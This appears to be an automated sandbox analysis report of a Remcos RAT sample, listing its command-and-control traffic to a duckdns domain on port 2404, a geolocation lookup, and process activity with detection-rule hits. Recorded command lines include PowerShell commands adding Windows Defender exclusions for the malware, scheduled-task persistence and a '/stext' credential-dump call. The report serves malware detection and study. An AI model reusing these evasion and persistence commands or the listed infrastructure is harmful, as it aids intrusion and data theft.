                                                            Oct 28, 2024 18:37:11.160286903 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160303116 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160317898 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160331964 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160346031 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.160346031 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160387993 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.160537958 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160552979 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160567045 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160578012 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.160620928 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.160638094 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160654068 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160669088 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160685062 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160702944 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.160763025 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160764933 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.160885096 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160901070 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160913944 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.160934925 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.160969019 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161159992 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161176920 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161191940 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161233902 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161385059 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161401033 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161416054 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161442995 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161463022 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161479950 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161479950 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161497116 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161513090 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161547899 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161572933 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161845922 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161859989 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161880970 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161896944 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161897898 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161911964 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161927938 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161942959 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161956072 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161962032 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161978006 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161981106 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161995888 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161997080 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.162018061 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.162087917 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.164400101 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.178706884 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178724051 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178739071 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178793907 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.178829908 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.178865910 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178883076 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178932905 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.179155111 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.179171085 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.179183960 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.179235935 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.182782888 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.182797909 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.182812929 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.182842970 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.182888031 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:12.536119938 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:12.559039116 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559056044 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559067965 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559225082 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:12.559282064 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559295893 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559309006 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559329033 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559344053 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559354067 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:12.559361935 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559376001 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590711117 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590821981 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590831995 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590888977 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590898037 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590905905 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.594918966 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.595258951 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:13.108546019 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:13.108922005 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:14.230822086 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:14.261377096 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:14.263391972 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:14.264264107 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:14.295067072 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:15.238370895 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:15.238482952 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:15.248792887 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:15.280731916 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:16.503736973 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:16.503947020 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:16.746793032 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:16.746860981 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:16.828504086 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:16.828583956 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:33.036115885 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:33.038512945 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:33.043906927 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:03.035809040 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:03.039587975 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:38:03.044852018 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:33.050894976 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:33.052963972 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:38:33.058461905 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:56.981085062 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:38:56.986499071 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:39:03.065418959 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:39:03.066800117 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:39:03.072308064 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:39:33.065313101 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:39:33.068977118 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:39:33.074764967 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:03.079778910 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:03.084469080 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:40:03.089880943 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:33.085575104 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:33.087038040 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:40:33.433893919 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:40:33.436541080 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:33.436589956 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:40:33.464917898 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:41:03.081873894 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:41:03.083440065 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:41:03.328546047 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:41:03.328665018 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:41:03.340125084 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:41:03.426088095 CET240449712103.186.117.77192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 28, 2024 18:37:03.814304113 CET6172653192.168.2.51.1.1.1
                                                            Oct 28, 2024 18:37:04.831513882 CET6172653192.168.2.51.1.1.1
                                                            Oct 28, 2024 18:37:05.484589100 CET53617261.1.1.1192.168.2.5
                                                            Oct 28, 2024 18:37:07.003534079 CET5080453192.168.2.51.1.1.1
                                                            Oct 28, 2024 18:37:07.046437025 CET53508041.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 28, 2024 18:37:03.814304113 CET192.168.2.51.1.1.10xf22Standard query (0)bubemoney7221.duckdns.orgA (IP address)IN (0x0001)false
                                                            Oct 28, 2024 18:37:04.831513882 CET192.168.2.51.1.1.10xf22Standard query (0)bubemoney7221.duckdns.orgA (IP address)IN (0x0001)false
                                                            Oct 28, 2024 18:37:07.003534079 CET192.168.2.51.1.1.10x54a6Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 28, 2024 18:37:05.484589100 CET1.1.1.1192.168.2.50xf22No error (0)bubemoney7221.duckdns.org103.186.117.77A (IP address)IN (0x0001)false
                                                            Oct 28, 2024 18:37:07.046437025 CET1.1.1.1192.168.2.50x54a6No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • geoplugin.net

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549714178.237.33.50807308C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 28, 2024 18:37:14.264264107 CET71OUTGET /json.gp HTTP/1.1
                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
                                                            Oct 28, 2024 18:37:15.238370895 CET1164INHTTP/1.1 200 OK
                                                            date: Mon, 28 Oct 2024 17:37:15 GMT
                                                            server: Apache
                                                            content-length: 956
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                                            Data Ascii: { "geoplugin_request":"155.94.241.188", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:13:36:59
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                                                            Imagebase:0x140000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:13:37:01
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                                                            Imagebase:0x330000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                                                            Imagebase:0x330000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"
                                                            Imagebase:0xe0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:13:37:02
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                                                            Imagebase:0x920000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:10
                                                            Start time:13:37:03
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            Imagebase:0xf70000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 24%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:13:37:04
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff6ef0c0000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:13:37:06
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp"
                                                            Imagebase:0xe0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:13:37:06
                                                            Start date:28/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:13:37:06
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                                                            Imagebase:0x1d0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:13:37:06
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                                                            Imagebase:0xdd0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
                                                            Imagebase:0x1b0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
                                                            Imagebase:0xee0000
                                                            File size:1'144'840 bytes
